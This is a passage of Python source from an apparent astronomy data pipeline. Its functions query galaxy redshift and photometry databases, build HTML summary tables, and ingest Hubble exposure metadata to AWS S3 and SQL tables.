        elif c.startswith('bic_'):
            info[c].format = '.1f'
        elif c in ['z02', 'z16', 'z50', 'z84', 'z97']:
            info[c].format = '.3f'
        elif c[:4] in ['splf', 'sple']:
            # Spline continuum fluxes/errors: scientific notation
            info[c].format = '.1e'
        elif c.startswith('flux_') | c.startswith('err_'):
            info[c].format = '.1e'

    # Rewrite ctime-style modification times as sortable ISO strings
    if convert_mtime & ('mtime' in info.colnames):
        iso_times = [utils.ctime_to_iso(m, verbose=False, strip_decimal=True)
                     for m in info['mtime']]
        info['mtime'] = iso_times
def query_from_ds9(ds9, radius=5, engine=None, extra_cols=['mag_auto', 'z_map', 'bic_diff', 't_g800l', 't_g102', 't_g141'], extra_query='', table_root='/tmp/ds9_query'):
    """
    Make a table by running a query for objects based on a DS9 pan position

    Parameters
    ----------
    ds9 : DS9-like object
        Must respond to ``ds9.get('pan fk5')`` with an "ra dec" string.

    radius : float
        Box half-size around the pan position, arcsec.

    engine : sqlalchemy engine, optional
        Database connection; created if not provided.

    extra_cols : list
        Columns added to the minimal (root, id, status, ra, dec) selection.

    extra_query : str
        Extra SQL appended to the WHERE clause.

    table_root : str
        Output root for the HTML table and DS9 region file.

    Returns
    -------
    Query result table sorted by distance from the pan position; also
    writes ``{table_root}.html`` and ``{table_root}.reg``.
    """
    from grizli import utils, prep

    if engine is None:
        engine = get_db_engine(echo=False)

    # FIX: np.cast was deprecated and removed in NumPy 2.0;
    # np.asarray(..., dtype=float) is the supported equivalent
    ra, dec = np.asarray(ds9.get('pan fk5').split(), dtype=float)

    # Search box in degrees; RA width corrected for declination
    dd = radius/3600.
    dr = dd/np.cos(dec/180*np.pi)

    min_cols = ['root', 'id', 'status', 'ra', 'dec']
    colstr = ','.join(min_cols + extra_cols)

    q = from_sql(f'select {colstr} '
                 f'from redshift_fit natural join photometry_apcorr '
                 f'where ra > {ra-dr} AND ra < {ra+dr}'
                 f' AND dec > {dec-dd} and dec < {dec+dd}' + extra_query,
                 engine)

    # Distance of each match from the pan position
    tt = utils.GTable()
    tt['ra'] = [ra]
    tt['dec'] = [dec]

    _idx, _dr = tt.match_to_catalog_sky(q)
    q['_dr'] = _dr
    q['_dr'].format = '.2f'

    so = np.argsort(q['_dr'])

    make_html_table(sync=None, res=q[so], use_json=False,
                    table_root=table_root, sort_column=('_dr', 1))

    comment = [f'{id}' for id in q['id'][so]]
    prep.table_to_regions(q[so], table_root+'.reg', comment=comment)

    return q[so]
def make_html_table(engine=None, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'd4000', 'd4000_e'], where="AND status >= 5 AND root='j163852p4039'", tables=[], table_root='query', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], sort_column=('bic_diff', -1), fit_table='redshift_fit', verbose=True, get_sql=False, res=None, show_hist=False, extra_formats={}, use_json=True, use_join=False):
    """
    Query the photometry + redshift-fit tables and write a sortable HTML
    summary table, optionally with a redshift histogram figure.

    Parameters
    ----------
    engine : sqlalchemy engine or None
        Database connection; created with ``get_db_engine`` if None.
    columns : list of str
        Columns to SELECT (may include SQL expressions / aliases).
    where : str
        Extra WHERE clauses, written to start with ``AND``.
    tables : list of str
        Additional tables to add to the FROM clause (non-join mode).
    table_root : str
        Basename for the output ``{table_root}.html`` / ``.json`` files.
    sync : str
        If set, ``aws s3 sync`` destination for the output products.
    png_ext : list of str
        Cutout image extensions turned into <img> link columns.
    sort_column : (str, int)
        Column name and direction (+1/-1) for the initial sort order.
    fit_table : str
        Name of the redshift-fit table to join against the photometry.
    get_sql : bool
        If True, return the SQL string without executing it.
    res : DataFrame/table or None
        Pre-computed query result to reuse instead of hitting the DB.
    show_hist : bool
        If True, also make a ``{table_root}_zhist.png`` z_map histogram.

    Returns
    -------
    res : pandas.DataFrame (or the input ``res``)
        The raw query result.
    """
    import time
    import numpy as np
    import matplotlib.pyplot as plt
    import pandas as pd
    from grizli import utils
    from grizli.aws import db as grizli_db

    if engine is None:
        engine = get_db_engine(echo=False)

    # Extra tables appended to the FROM list (only used when use_join=False)
    if len(tables) > 0:
        extra_tables = ','+','.join(tables)
    else:
        extra_tables = ''

    if use_join:
        # NATURAL JOIN form; `where` starts with "AND", so patch the
        # resulting "WHERE AND" back into a valid clause
        query = "SELECT {0} FROM {1} NATURAL JOIN photometry_apcorr WHERE {2};".format(','.join(columns), fit_table, where)
        query = query.replace('WHERE AND', 'AND')
    else:
        # Implicit join on phot_root/p_root and id/p_id
        query = "SELECT {0} FROM photometry_apcorr, {3}{1} WHERE phot_root = p_root AND id = p_id {2};".format(','.join(columns), extra_tables, where, fit_table)

    if get_sql:
        # Return the SQL string itself without querying
        return query

    if res is not None:
        info = res
    else:
        res = pd.read_sql_query(query, engine)
        info = utils.GTable.from_pandas(res)

        if verbose:
            print('Query: {0}\n Results N={1}'.format(query, len(res)))

        # Array-valued column that can't be rendered in the HTML table
        if 'cdf_z' in info.colnames:
            info.remove_column('cdf_z')

        # Strip the photometry-table 'p_' prefix (p_ra -> ra, ...)
        for c in info.colnames:
            if c.startswith('p_'):
                try:
                    info.rename_column(c, c[2:])
                except:
                    pass

    all_columns = info.colnames.copy()

    if 'idx' not in info.colnames:
        # Vizier cone-search link labelled with the object id; replaces
        # the plain 'id' column in the output
        idx = ['<a href="http://vizier.u-strasbg.fr/viz-bin/VizieR?-c={0:.6f}+{1:.6f}&-c.rs=2">#{2:05d}</a>'.format(info['ra'][i], info['dec'][i], info['id'][i]) for i in range(len(info))]
        info['idx'] = idx
        all_columns.insert(0, 'idx')
        all_columns.pop(all_columns.index('id'))

    set_column_formats(info, extra=extra_formats)

    print('Sort: ', sort_column, sort_column[0] in all_columns)
    if sort_column[0] in all_columns:
        scol = info[sort_column[0]]
        if hasattr(scol, 'mask'):
            # Push masked entries to the end of the ascending sort
            sdata = scol.filled(fill_value=-np.inf).data
        else:
            sdata = scol

        so = np.argsort(sdata)[::sort_column[1]]
        #info = info[so[::sort_column[1]]]
    # NOTE(review): if sort_column[0] is *not* in all_columns, `so` is
    # never defined and the write_sortable_html call below will raise a
    # NameError -- confirm callers always pass a valid sort column.

    # PNG columns
    AWS = 'https://s3.amazonaws.com/grizli-v1/Pipeline'
    # COSMOS fields live in a separate bucket
    bucket = ['grizli-cosmos-v2' if r.startswith('cos-') else 'grizli-v1' for r in info['root']]

    for ext in png_ext:
        if ext == 'thumb':
            subdir = 'Thumbnails'
            print(ext, subdir)
        elif ext == 'rgb':
            subdir = 'Thumbnails'
        else:
            subdir = 'Extractions'

        if 'png_{0}'.format(ext) not in info.colnames:
            png = ['{0}_{1:05d}.{2}.png'.format(root, id, ext) for root, id in zip(info['root'], info['id'])]
            if ext == 'rgb':
                # RGB thumbnails flip to the segmentation image on hover
                js = '<a href={0}/{2}><img src={0}/{1} onmouseover="this.src = this.src.replace(\'rgb.pn\', \'seg.pn\')" onmouseout="this.src = this.src.replace(\'seg.pn\', \'rgb.pn\')" height=200></a>'
                paths = ['{0}/{1}/{2}'.format(AWS.replace('grizli-v1', buck),
                                              root, subdir)
                         for buck, root in zip(bucket, info['root'])]

                png_url = [js.format(path, p,
                                     p.replace('.rgb.png', '.thumb.png'))
                           for path, p in zip(paths, png)]

                info['png_{0}'.format('rgb')] = png_url
            else:
                info['png_{0}'.format(ext)] = ['<a href="{0}/{1}/{2}/{3}"><img src={0}/{1}/{2}/{3} height=200></a>'.format(AWS.replace('grizli-v1', buck), root, subdir, p) for buck, root, p in zip(bucket, info['root'], png)]

        all_columns.append('png_{0}'.format(ext))

    # Only numeric (non-string) columns get sort/filter controls
    sortable = []
    for c in all_columns:
        if not hasattr(info[c][0], 'upper'):
            sortable.append(c)

    info[all_columns][so].write_sortable_html('{0}.html'.format(table_root), replace_braces=True, localhost=False, max_lines=1e5, table_id=None, table_class='display compact', css=None, filter_columns=sortable, buttons=['csv'], toggle=True, use_json=use_json)

    if show_hist:
        from matplotlib.ticker import FixedLocator, AutoLocator, MaxNLocator

        xti = xt = np.arange(0, 3.6, 0.5)
        loc = np.arange(0, 3.6, 0.1)
        # Log-spaced redshift bins, plotted in log(1+z)
        bins = utils.log_zgrid([0.03, 3.5], 0.01)

        fig = plt.figure(figsize=[8, 4])
        ax = fig.add_subplot(111)
        # NOTE(review): `normed` was removed from Axes.hist in recent
        # matplotlib versions (use `density`) -- confirm the pinned
        # matplotlib version before running.
        ax.hist(np.log(1+res['z_map']), bins=np.log(1+bins), color='k',
                alpha=0.2, label=table_root, normed=False)

        # Overplot the high-confidence subset
        clip = res['bic_diff'].values > 30
        ax.hist(np.log(1+res['z_map'].values[clip]), bins=np.log(1+bins),
                color='r', alpha=0.3, normed=False)

        xts = ax.set_xticks(np.log(1+xt))
        xtl = ax.set_xticklabels(xti)

        ax.xaxis.set_minor_locator(FixedLocator(np.log(1+loc)))
        ax.yaxis.set_major_locator(MaxNLocator(integer=True))
        ax.set_xlabel('z_map')
        ax.set_ylabel(r'$N$')

        # Label to show line mis-id: Ha <-> [OIII] confusion spacing
        dz_wrong = (6563.-5007)/5007
        ax.plot(np.arange(5)*dz_wrong, np.ones(5)*ax.get_ylim()[1], marker='.', markerfacecolor='w', markeredgecolor='w', color='r', markersize=10)
        ax.set_xlim(0, np.log(1+3.7))

        ax.grid()
        ax.legend(loc='upper right')

        fig.tight_layout(pad=0.1)
        fig.text(1-0.02, 0.02, utils.nowtime(), ha='right', va='bottom',
                 transform=fig.transFigure, fontsize=5)

        fig.savefig('{0}_zhist.png'.format(table_root))

    if sync:
        # `os` is expected to come from the module-level imports
        os.system('aws s3 sync ./ {0} --exclude "*" --include "{1}.html" --include "{1}.json" --include "{1}_zhist.png" --acl public-read'.format(sync, table_root))

    return res
def get_exposure_info():
    """
    Get exposure information from the MAST databases

    One-off ingestion script: (1) query MAST per proposal for all programs
    found in the master visits file, (2) push the query/product tables to
    the `mast_query` / `mast_products` DB tables, and (3) build the
    `exposure_log` table from the visit footprints.

    NOTE(review): relies on module-level `utils`, `np`, `glob` and on the
    `{master}_visits.fits` / `.npy` files being present in the working
    directory -- confirm before running.
    """
    import mastquery.query

    # Successive dataset versions; only the last assignment is used
    master = 'grizli-v1-19.12.04'
    master = 'grizli-v1-19.12.05'
    master = 'grizli-v1-20.10.12'

    tab = utils.read_catalog('{0}_visits.fits'.format(master))
    all_visits = np.load('{0}_visits.npy'.format(master), allow_pickle=True)[0]

    all_files = []
    for v in all_visits:
        all_files.extend(v['files'])

    # HST proposal ID is encoded in characters 1-3 of the exposure rootname
    prog = [f[1:4] for f in all_files]
    _res = np.unique(np.array(prog), return_counts=True)

    t = utils.GTable()
    t['prog'] = _res[0]
    t['count'] = _res[1]
    so = np.argsort(t['count'])
    # Process programs with the most exposures first
    t = t[so[::-1]]

    for pr in t['prog']:
        # Query results are cached to FITS files, one pair per program
        if os.path.exists('{0}_query.fits'.format(pr)):
            #print('Skip ', pr)
            continue

        print(pr)
        try:
            _q = mastquery.query.run_query(obs_id='[ij]{0}*'.format(pr))
            _p = mastquery.query.get_products_table(_q)
        except:
            # Best-effort: skip programs where the MAST query fails
            continue

        _q.write('{0}_query.fits'.format(pr))
        _p.write('{0}_prod.fits'.format(pr))

    # Send to AWS
    from grizli.aws import db
    import pandas as pd
    from astropy.table import Table
    engine = db.get_db_engine()

    files = glob.glob('*query.fits')
    files.sort()

    # Column subset pushed to the `mast_query` table
    cols = ['obs_id', 'target', 'target_ra', 'target_dec', 't_min', 't_max', 'exptime', 'wavelength_region', 'filter', 'em_min', 'em_max', 'target_classification', 'obs_title', 't_obs_release', 'instrument_name', 'proposal_pi', 'proposal_id', 'proposal_type', 'sregion', 'dataRights', 'mtFlag', 'obsid', 'objID', 'visit']

    for i, file in enumerate(files):
        print(file)
        _q = Table.read(file, character_as_bytes=False)
        # Force integer dtypes so pandas/SQL columns come out consistent
        _q['proposal_id'] = np.cast[np.int16](_q['proposal_id'])
        _q['obsid'] = np.cast[np.int64](_q['obsid'])
        _q['objID'] = np.cast[np.int64](_q['objID'])
        _q.rename_column('ra','target_ra')
        _q.rename_column('dec','target_dec')
        _q.rename_column('footprint', 'sregion')
        df = _q[cols].to_pandas()
        df.to_sql('mast_query', engine, index=False, if_exists='append', method='multi')

    files = glob.glob('*_prod.fits')
    files.sort()

    cols = ['obsid', 'dataset']
    for i, file in enumerate(files):
        print(i, file)
        _p = Table.read(file, character_as_bytes=False)
        _p['obsid'] = np.cast[np.int64](_p['obsid'])
        # Dataset rootname = observation_id without the trailing character
        _p['dataset'] = [d[:-1] for d in _p['observation_id']]
        df = _p[cols].to_pandas()
        df.to_sql('mast_products', engine, index=False, if_exists='append', method='multi')

    ##########
    # Exposure log
    # Initialize, adding an array column manually for the footprints
    v = all_visits[0]
    N = len(v['files'])
    # Convex-hull outline of each exposure footprint as [[x...],[y...]]
    fps = [np.array(fp.convex_hull.boundary.xy)[:, :-1].tolist() for fp in v['footprints']]
    df = pd.DataFrame()
    df['file'] = [f.split('_')[0] for f in v['files']]
    df['dataset'] = [f.split('_')[0][:-1] for f in v['files']]
    df['extension'] = [f.split('_')[1][:3] for f in v['files']]
    df['filter'] = v['filter']
    df['parent'] = v['parent']
    df['awspath'] = v['awspath']
    df['product'] = v['product']
    # Overrides the 'filter' column above with the value from the product name
    df['filter'] = v['product'].split('-')[-1]
    df['ra'] = [fp.centroid.xy[0][0] for fp in v['footprints']]
    df['dec'] = [fp.centroid.xy[1][0] for fp in v['footprints']]
    # Approximate footprint area in arcmin^2 (cos(dec) correction)
    df['area'] = [fp.area*np.cos(df['dec'][i]/180*np.pi)*3600 for i, fp in enumerate(v['footprints'])]

    # Make table: create schema from the first visit, add the array and
    # scalar columns, then empty it before the bulk insert below
    engine.execute('drop table exposure_log;')
    df.to_sql('exposure_log', engine, index=False, if_exists='append', method='multi')
    engine.execute('alter table exposure_log add column footprint float [];')
    engine.execute('delete from exposure_log where True;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN mdrizsky float;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN exptime float;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN expstart float;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN ndq int;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN expflag VARCHAR;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN sunangle float;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN gsky101 real;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN gsky102 real;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN gsky103 real;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN persnpix integer;')
    engine.execute('ALTER TABLE exposure_log ADD COLUMN perslevl real;')

    # Files already ingested, to make the loop below restartable
    _exp = db.from_sql("select distinct(file) from exposure_log", engine)
    db_files = np.unique(_exp['file'])

    charge = db.from_sql("select * from charge_fields", engine)

    # Batch size for the bulk inserts
    SKIP = 1000
    df0 = None

    for i, v in enumerate(all_visits):
        _count = np.sum([f.split('_')[0] in db_files for f in v['files']])
        if _count == len(v['files']):
            # Every exposure of this visit is already in the DB
            continue

        if v['parent'] not in charge['field_root']:
            print('Warning: {0} not in charge["field_root"]'.format(v['parent']))
            continue

        print(i, v['parent'], v['product'], _count, len(v['files']))

        N = len(v['files'])
        fps = [np.array(fp.convex_hull.boundary.xy)[:, :-1].tolist() for fp in v['footprints']]
        df = pd.DataFrame()
        df['file'] = [f.split('_')[0] for f in v['files']]
        df['dataset'] = [f.split('_')[0][:-1] for f in v['files']]
        df['extension'] = [f.split('_')[1][:3] for f in v['files']]
        df['filter'] = v['filter']
        df['parent'] = v['parent']
        df['awspath'] = v['awspath']
        df['product'] = v['product']
        df['filter'] = v['product'].split('-')[-1]
        df['ra'] = [fp.centroid.xy[0][0] for fp in v['footprints']]
        df['dec'] = [fp.centroid.xy[1][0] for fp in v['footprints']]
        df['area'] = [fp.area*np.cos(df['dec'][i]/180*np.pi)*3600 for i, fp in enumerate(v['footprints'])]
        df['footprint'] = fps

        # Accumulate visits and flush to the DB in batches of > SKIP rows
        if df0 is None:
            df0 = df
        else:
            df0 = df0.append(df)

        if len(df0) > SKIP:
            # Send to DB and reset append table
            print('>>> to DB >>> ({0}, {1})'.format(i, len(df0)))
            df0.to_sql('exposure_log', engine, index=False, if_exists='append', method='multi')
            # Empty frame with the same columns restarts the accumulator
            df0 = df[:0]
def update_all_exposure_log():
    """
    Run all

    Interactive driver: select `exposure_log` rows that are missing header
    metadata and run `update_exposure_log` on each.  The many commented
    queries are alternative selections used for different campaigns; only
    the *last* uncommented `_files` assignment takes effect.
    """
    import glob
    import numpy as np

    from grizli.aws import db
    from importlib import reload
    reload(db)

    config = db.get_connection_info(config_file='/home/ec2-user/db_readonly.yml')
    engine = db.get_db_engine(config=config)

    # DASH
    #_files = db.from_sql("SELECT file from exposure_log WHERE mdrizsky is null AND file like 'icxe%%'", engine)

    # COSMOS F160W
    _files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND awspath like 'grizli-cosmos%%' AND filter like 'f160w'", engine)

    # COSMOS F814W
    #_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND ABS(ra-150.1) < 0.6 AND ABS(dec-2.2) < 0.6 AND filter like 'f814w'", engine)

    #_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND ABS(ra-150.1) < 0.6 AND ABS(dec-2.2) < 0.6", engine)

    ### COSMOS grism
    #_files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND ABS(ra-150.1) < 0.6 AND ABS(dec-2.2) < 0.6 AND filter like 'g1%%'", engine)

    ### All grism
    #_files = db.from_sql("SELECT file, filter, awspath, mdrizsky from exposure_log WHERE mdrizsky is null AND filter like 'g1%%'", engine)

    #db.update_exposure_log({'file':_files['file'][0], 'engine':engine, 'skip':False}, {})

    # All IR
    # _files = db.from_sql("SELECT file, filter from exposure_log WHERE mdrizsky is null AND filter like 'f0%%'", engine)

    #
    _files = db.from_sql("SELECT file, filter, parent from exposure_log WHERE mdrizsky is null AND filter like 'f%%'", engine)

    _files = db.from_sql("SELECT file, filter, parent, product from exposure_log WHERE mdrizsky is null AND gsky101 is null", engine)

    # Skip 3DHST
    # NOTE(review): `keep` is built here but never applied to `_files`
    # before it is overwritten below -- confirm whether the 3DHST filter
    # was meant to be used.
    keep = _files['parent'] != 'xx'
    for p in ['j123656p6215','j141952p5255','j033236m2748','j021740m0512']:
        keep &= _files['parent'] != p

    #_files = db.from_sql("SELECT file, filter from exposure_log WHERE mdrizsky is null AND awspath like 'grizli-cosmos%%' AND filter like 'f814w' LIMIT 10", engine)

    # latest cosmos  (this is the selection that is actually processed)
    _files = db.from_sql("SELECT file, filter, awspath from exposure_log WHERE mdrizsky is null AND awspath like 'cosmos-dash%%' AND filter like 'f160w'", engine)

    N = len(_files)
    # Randomize the processing order
    idx = np.argsort(np.random.normal(size=N))

    for i, file in enumerate(_files['file'][idx]):
        print(f'\n {i+1} / {N}\n')
        # Skip files that are currently present in the working directory
        # (e.g. being processed by another worker)
        _ = glob.glob(f'{file}*')
        if len(_) == 0:
            db.update_exposure_log({'file':file, 'engine':engine}, {})
def update_exposure_log(event, context):
    """
    Get exposure info from FITS file and put in database

    Downloads the exposure FITS file from S3, reads header/sky keywords
    and updates the corresponding `exposure_log` row, optionally dumping a
    compact DQ file back to S3.  Written in AWS-Lambda handler style
    (``event`` dict + unused ``context``).

    Recognized `event` keywords (default):

        'file' : file rootname in exposure_log, *required*

        'keywords' : list of keywords to take from the Primary header
                     (['EXPFLAG','EXPTIME','EXPSTART','SUNANGLE'])

        'dump_dq' : generate a compact DQ file and upload to S3 (True)

        'remove': Remove the downloaded exposure file (True)

        'skip': Don't do anything if 'mdrizsky' populated in database

    Returns
    -------
    ``False`` on failure, ``True`` if skipped, otherwise the dict of
    keyword values written to the database.
    """
    import os
    import boto3
    import astropy.io.fits as pyfits
    from grizli import utils

    if 'file' not in event:
        print("'file' keyword not found in `event`")
        return False

    if 'keywords' in event:
        keywords = event['keywords']
    else:
        keywords = ['EXPFLAG','EXPTIME','EXPSTART','SUNANGLE']
        # WFC3/IR sky and persistence diagnostics
        keywords += ['GSKY101', 'GSKY102', 'GSKY103', 'PERSNPIX', 'PERSLEVL']

    # Values collected from the FITS headers, keyed by DB column name
    kwvals = {}

    if 'engine' in event:
        engine = event['engine']
    else:
        engine = get_db_engine(echo=False)

    # NOTE(review): `event['file']` is interpolated directly into SQL
    # here and below -- safe only for trusted callers; confirm inputs.
    _q = from_sql("SELECT * from exposure_log where file LIKE '{0}'".format(event['file']), engine)
    if len(_q) == 0:
        print('File {0} not found in `exposure_log`'.format(event['file']))
        return False

    if 'skip' in event:
        skip = event['skip']
    else:
        skip = True

    # An unmasked mdrizsky column means the row was already populated
    if (not hasattr(_q['mdrizsky'], 'mask')) & skip:
        print('Info for {0} found in `exposure_log`'.format(event['file']))
        return True

    #
    local_file = '{0}_{1}.fits'.format(_q['file'][0], _q['extension'][0])

    s3 = boto3.resource('s3')
    # awspath is stored as 'bucket/key/prefix'
    bucket = _q['awspath'][0].split('/')[0]
    bkt = s3.Bucket(bucket)
    awsfile = '/'.join(_q['awspath'][0].split('/')[1:]).strip('/')
    awsfile += '/'+local_file

    print(f'{bucket}:{awsfile} > {local_file}')
    if not os.path.exists(local_file):
        try:
            bkt.download_file(awsfile, local_file,
                              ExtraArgs={"RequestPayer": "requester"})
        except:
            print(f'Failed to download s3://{bucket}/{awsfile}')

            # Try other bucket path
            if 'Exposures' in awsfile:
                bucket = 'grizli-v1'
                bkt = s3.Bucket(bucket)
                awsfile = 'Pipeline/{0}/Prep/'.format(_q['parent'][0])
                awsfile += local_file
                try:
                    bkt.download_file(awsfile, local_file,
                                      ExtraArgs={"RequestPayer": "requester"})
                except:
                    print(f'Failed to download s3://{bucket}/{awsfile}')
                    return False

                # Record the working path so the DB row gets corrected
                kwvals['awspath'] = f'{bucket}/{os.path.dirname(awsfile)}'
            else:
                return False

    ######### Update exposure_log table
    im = pyfits.open(local_file)
    # Number of unflagged (DQ == 0) pixels
    kwvals['ndq'] = (im['DQ',1].data == 0).sum()
    if 'MDRIZSKY' in im['SCI',1].header:
        kwvals['mdrizsky'] = im['SCI',1].header['MDRIZSKY']

    # Copy over requested primary-header keywords that have a DB column
    for k in keywords:
        if (k in im[0].header) & (k.lower() in _q.colnames):
            kwvals[k.lower()] = im[0].header[k]

    # Build "col = {col}" fragments; strings get quoted
    set_keys = []
    for k in kwvals:
        if isinstance(kwvals[k], str):
            _set = 'x = \'{x}\''
        else:
            _set = 'x = {x}'

        set_keys.append(_set.replace('x', k))

    sqlstr = ('UPDATE exposure_log SET ' + ', '.join(set_keys) +
              " WHERE file LIKE '{0}'".format(event['file']))

    print(sqlstr.format(**kwvals))
    engine.execute(sqlstr.format(**kwvals))
    im.close()

    ######### Compact DQ file
    if 'dump_dq' in event:
        dump_dq = event['dump_dq']
    else:
        dump_dq = True

    if dump_dq:
        utils.dump_flt_dq(local_file)
        repl = ('.fits', '.dq.fits.gz')
        print(f'{local_file} > {bucket}:{awsfile}'.replace(*repl))
        try:
            bkt.upload_file(local_file.replace(*repl),
                            awsfile.replace(*repl),
                            ExtraArgs={'ACL':'public-read'})
        except:
            # Best-effort upload; the DB update above already succeeded
            print(f'Failed to upload s3://{bucket}:{awsfile}'.replace(*repl))

    # Clean up the downloaded files
    remove = True
    if 'remove' in event:
        remove = event['remove']

    if remove:
        print('Remove '+local_file)
        if os.path.exists(local_file):
            os.remove(local_file)

        if dump_dq:
            print('Remove '+local_file.replace(*repl))
            if os.path.exists(local_file.replace(*repl)):
                os.remove(local_file.replace(*repl))

    return kwvals
def run_shrink_ramps():
    """
    Batch driver: shrink oversized ``*_ramp.png`` files for a few
    exposures selected from the ``exposure_log`` table.

    Bug fix: the original body referenced an ``engine`` variable that was
    never defined in this scope (guaranteed ``NameError``); the database
    connection is now created explicitly with the module's default
    settings before it is used.
    """
    from grizli.aws import db

    # Previously missing: create the DB connection that both the query
    # and shrink_ramp_file() below need.
    engine = db.get_db_engine()

    _q = db.from_sql("select file, awspath, parent from exposure_log where extension LIKE 'flt' AND parent LIKE 'j002836m3311' limit 5", engine)

    for i, (file, awspath, parent) in enumerate(zip(_q['file'], _q['awspath'], _q['parent'])):
        # shrink_ramp_file downloads, converts and re-uploads each PNG
        shrink_ramp_file(file, awspath, parent, engine=engine, MAX_SIZE=2*1024**2, convert_args='-scale 35% -quality 90', remove=True)
def shrink_ramp_file(file, awspath, parent, engine=None, MAX_SIZE=2*1024**2, convert_args='-scale 35% -quality 90', remove=True):
    """
    Make ramp.png files smaller with ImageMagick

    Downloads ``{file}_ramp.png`` from S3, and if it is larger than
    ``MAX_SIZE`` bytes, shrinks it with ImageMagick ``convert`` using
    ``convert_args`` and uploads the result back to the same S3 key.

    Parameters
    ----------
    file : str
        Exposure rootname.
    awspath : str
        S3 location as 'bucket/prefix' (``/Prep`` is mapped to ``/RAW``).
    parent : str
        Field name used for the fallback ``grizli-v1`` bucket path.
    engine : sqlalchemy engine or None
        Created with ``get_db_engine`` if None (not otherwise used here).
    MAX_SIZE : int
        Size threshold in bytes above which the PNG is re-scaled.
    remove : bool
        Delete the local copies when done.

    Returns
    -------
    ``False`` if the download fails; otherwise ``None``.
    """
    import os
    import subprocess
    import shutil

    import boto3
    import astropy.io.fits as pyfits
    from grizli import utils

    if engine is None:
        engine = get_db_engine(echo=False)

    local_file = '{0}_ramp.png'.format(file)

    s3 = boto3.resource('s3')
    bucket = awspath.split('/')[0]
    bkt = s3.Bucket(bucket)
    awsfile = '/'.join(awspath.split('/')[1:])
    awsfile += '/'+local_file
    # ramp PNGs live alongside the raw data, not the processed products
    awsfile = awsfile.replace('/Prep','/RAW')

    print(f'{bucket}/{awsfile} > {local_file}')
    if not os.path.exists(local_file):
        try:
            bkt.download_file(awsfile, local_file,
                              ExtraArgs={"RequestPayer": "requester"})
        except:
            print(f'Failed to download s3://{bucket}/{awsfile}')

            # Try other bucket path
            if 'Exposures' in awsfile:
                bucket = 'grizli-v1'
                bkt = s3.Bucket(bucket)
                awsfile = 'Pipeline/{0}/RAW/'.format(parent)
                awsfile += local_file
                try:
                    bkt.download_file(awsfile, local_file,
                                      ExtraArgs={"RequestPayer": "requester"})
                except:
                    print(f'Failed to download s3://{bucket}/{awsfile}')
                    return False
            else:
                return False

    print(f'{local_file:>25} {os.stat(local_file).st_size/1024**2:.2f}')

    bw_file = local_file.replace('.png', '.sm.png')
    if os.stat(local_file).st_size > MAX_SIZE:
        # Shell out to ImageMagick to rescale/recompress the PNG
        subprocess.call(f"convert {convert_args} {local_file} {bw_file}",
                        shell=True)

        print(f'{bw_file:>25} {os.stat(bw_file).st_size/1024**2:.2f}')

        try:
            # Overwrite the original S3 key with the shrunken version
            bkt.upload_file(bw_file, awsfile, ExtraArgs={'ACL':'public-read'})
        except:
            print(f'Failed to upload s3://{bucket}/{awsfile}')
    else:
        print('skip')

    if remove:
        print('Remove '+local_file)
        if os.path.exists(local_file):
            os.remove(local_file)

        if os.path.exists(bw_file):
            os.remove(bw_file)
def get_exposures_at_position(ra, dec, engine, dr=10):
    """
    Select `exposure_log` rows inside a box centered on (ra, dec).

    The RA half-width is stretched by 1/cos(dec) so that the search box
    is approximately square on the sky; `dr` is in degrees.
    """
    ra_halfwidth = dr / np.cos(dec / 180 * np.pi)
    query = 'select * from exposure_log where (ABS(ra - {0}) < {1}) AND (ABS(dec-{2}) < {3})'
    return from_sql(query.format(ra, ra_halfwidth, dec, dr), engine)
def add_irac_table():
    """
    Build the `spitzer_aors` and `spitzer_log` DB tables from the
    per-field `*ipac.fits` Spitzer coverage summaries.

    NOTE(review): relies on module-level `os`, `glob`, `utils`, `np` and a
    global `engine`, and on a hard-coded local working directory --
    confirm the environment before running.
    """
    from scipy.spatial import ConvexHull

    os.chdir('/Users/gbrammer/Research/HST/CHArGE/FieldsSummary')
    files = glob.glob('*ipac.fits')
    files.sort()

    bands = ['IRAC 3.6um', 'IRAC 4.5um', 'IRAC 5.8um', 'IRAC 8.0um', 'MIPS 24um']
    # Map short column key (e.g. 'irac36') -> full band name
    bkey = {}
    for b in bands:
        key = b.replace(' ', '').replace('.', '')[:-2].lower()
        bkey[key] = b

    N = 0
    # Per-field summary (exposure time, N exposures, footprint per band)
    data = {'field_root': []}
    # Field <-> Spitzer AOR request-key association
    aor_data = {'field_root': [], 'reqkey': []}
    for k in bkey:
        data['exp_'+k] = []
        data['n_'+k] = []
        data['fp_'+k] = []

    for i, file in enumerate(files):
        tab = utils.read_catalog(file)
        field = file.split('_ipac')[0]

        # Placeholder tables (column 'x') mean no Spitzer coverage
        if 'x' in tab.colnames:
            data['field_root'].append(field)
            for k in bkey:
                data['exp_'+k].append(0)
                data['n_'+k].append(0)
                data['fp_'+k].append([])

            continue

        N += len(tab)
        print(i, file, N)

        data['field_root'].append(field)
        for k in bkey:
            # Exposures of this band that overlap the HST field
            sel = tab['with_hst'] & (tab['wavelength'] == bkey[k])
            # Total exposure time in hours
            data['exp_'+k].append(tab['exposuretime'][sel].sum()/3600)
            data['n_'+k].append(sel.sum())
            if sel.sum() == 0:
                data['fp_'+k].append([])
                continue

            # Convex hull of the four corners of all selected exposures
            r, d = [], []
            for j in range(4):
                r.extend(tab['ra{0}'.format(j+1)][sel].data)
                d.extend(tab['dec{0}'.format(j+1)][sel].data)

            pts = np.array([r, d]).T
            vert = ConvexHull(pts).vertices
            fp = pts[vert, :]
            data['fp_'+k].append(fp.T.tolist())

        aors = np.unique(tab['reqkey'])
